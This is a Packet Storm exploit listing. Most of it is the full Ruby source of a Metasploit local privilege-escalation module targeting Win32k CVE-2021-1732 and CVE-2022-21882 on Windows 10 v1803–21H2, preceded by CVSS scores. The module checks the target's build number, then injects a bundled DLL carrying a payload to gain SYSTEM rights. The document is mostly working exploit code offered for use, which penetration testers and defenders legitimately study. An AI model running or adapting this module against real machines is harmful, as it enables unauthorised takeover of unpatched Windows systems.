Lucene search

Spencer McIntyre, BITTER APT, LiHao, KaLendsi, MaDongZe, TuXiaoYi, JinQuan, L4ys, metasploit.comPACKETSTORM:166169

HistoryFeb 28, 2022 - 12:00 a.m.

Win32k ConsoleControl Offset Confusion / Privilege Escalation

2022-02-2800:00:00

Spencer McIntyre, BITTER APT, LiHao, KaLendsi, MaDongZe, TuXiaoYi, JinQuan, L4ys, metasploit.com

packetstormsecurity.com

306

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Local  
Rank = AverageRanking  
  
include Msf::Post::File  
include Msf::Post::Windows::Priv  
include Msf::Post::Windows::Process  
include Msf::Post::Windows::ReflectiveDLLInjection  
prepend Msf::Exploit::Remote::AutoCheck  
  
include Msf::Exploit::Deprecated  
moved_from 'exploit/windows/local/cve_2021_1732_win32k'  
  
def initialize(info = {})  
super(  
update_info(  
info,  
{  
'Name' => 'Win32k ConsoleControl Offset Confusion',  
'Description' => %q{  
A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of  
NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being  
treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to  
achieve an out of bounds write operation, eventually leading to privilege escalation.  
  
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.  
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is  
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to  
function on a wider range of Windows 10 targets.  
},  
'License' => MSF_LICENSE,  
'Author' => [  
# CVE-2021-1732  
'BITTER APT', # exploit as used in the wild  
'JinQuan', # detailed analysis  
'MaDongZe', # detailed analysis  
'TuXiaoYi', # detailed analysis  
'LiHao', # detailed analysis  
# CVE-2022-21882  
'L4ys', # github poc  
# both CVEs  
'KaLendsi', # github pocs  
# Metasploit exploit  
'Spencer McIntyre' # metasploit module  
],  
'Arch' => [ ARCH_X64 ],  
'Platform' => 'win',  
'SessionTypes' => [ 'meterpreter' ],  
'DefaultOptions' => {  
'EXITFUNC' => 'thread'  
},  
'Targets' => [  
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]  
],  
'Payload' => {  
'DisableNops' => true  
},  
'References' => [  
# CVE-2021-1732 references  
[ 'CVE', '2021-1732' ],  
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],  
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],  
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],  
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],  
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit  
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],  
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],  
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],  
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],  
# CVE-2022-21882 references  
[ 'CVE', '2022-21882' ],  
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],  
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]  
],  
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date  
'DefaultTarget' => 0,  
'Notes' => {  
'Stability' => [ CRASH_OS_RESTARTS, ],  
'Reliability' => [ REPEATABLE_SESSION, ],  
'SideEffects' => []  
}  
}  
)  
)  
end  
  
def check  
sysinfo_value = sysinfo['OS']  
  
if sysinfo_value !~ /windows/i  
# Non-Windows systems are definitely not affected.  
return Exploit::CheckCode::Safe  
end  
  
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i  
vprint_status("Windows Build Number = #{build_num}")  
  
unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)  
print_error('The exploit only supports Windows 10 versions 1803 - 21H2')  
return CheckCode::Safe  
end  
  
CheckCode::Appears  
end  
  
def exploit  
if is_system?  
fail_with(Failure::None, 'Session is already elevated')  
end  
  
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86  
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')  
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86  
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')  
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64  
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')  
end  
  
encoded_payload = payload.encoded  
execute_dll(  
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),  
[encoded_payload.length].pack('I<') + encoded_payload  
)  
  
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')  
end  
end  
`